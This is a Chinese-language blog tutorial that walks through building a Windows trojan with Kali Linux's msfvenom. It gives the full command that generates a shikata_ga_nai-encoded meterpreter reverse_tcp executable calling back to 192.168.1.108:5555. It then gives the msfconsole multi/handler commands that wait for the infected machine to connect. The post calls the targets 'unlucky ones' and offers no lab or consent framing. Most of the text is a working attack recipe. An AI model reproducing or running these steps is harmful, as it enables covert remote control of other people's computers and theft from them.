美文网首页
kali下使用Metaspoit制作木马

kali下使用Metaspoit制作木马

作者: 这是什么娃哈哈 | 来源:发表于2018-09-26 21:02 被阅读0次

    首先,我们要先知道木马的使用过程,然后我们才能制作出木马

    - 木马:控制端(我们)

    -   被控制端(倒霉蛋们)

    - 虚拟机的kali

    - 打开终端

    - 使用msfvenom -p命令来制作

    -msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=192.168.1.108 LPORT=5555 -f exe > asd.exe

    - 看不明白?不要慌!

    - windows/meterpreter/reverse_tcp ->大体看出来这是windows下的tcp的一个漏洞(强大的Metaspoit自带多种漏洞,需要什么自行百度就ok)

    - -e x86/shikata_ga_nai ->这是编码方式(我的windows7是64位的,所以要选择对应的编码格式。否则,生成可执行文件再打开时就会出现错误!)

    - -i 5 ->编码次数

    - -b ->就是避免出现的值

    - -f exe ->生成.exe的可执行文件

    - asd.exe > 文件名.exe

    -  LHOST ->这是填写自己本机的IP(因为这种木马是用反弹机制)

    - LPORT ->填写自己的端口

    - 回车运行!

    - 我们可以看到,它生成一个476b的可执行文件

    - 问题来了!生成的文件在哪里?

    - 使用ls命令查看,生成在当前目录下

    - 然后,将生成文件复制到windows下

    -

    - 第二步

    - 配置接收木马上线的设置

    - 打开Metaspoit

    -msfconsole

    - 我们就要开始输入命令了

    -msf > use exploit/multi/handler

    - 我们使用handler模块

    -msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

    - 打开handler模块后,设置我们制作时用的木马漏洞

    - 我们现在就要设置接收的IP和端口

    - 输入命令

    -msf exploit(handler) > show options

    - 显示,我们需要填写什么设置

    - 大家还记得我们制作木马时,填写的ip和端口吧

    - 一定要对应

    -msf exploit(handler) > set lhost 192.168.1.108

    - 使用set来依次设置

    -msf exploit(handler) > set lport 5555

    - 成功设置后

    - 最后一步!

    - 输入

    -msf exploit(handler) > exploit

    - 运行,等待木马上线

    相关文章

      网友评论

          本文标题:kali下使用Metaspoit制作木马

          本文链接:https://www.haomeiwen.com/subject/bbwjoftx.html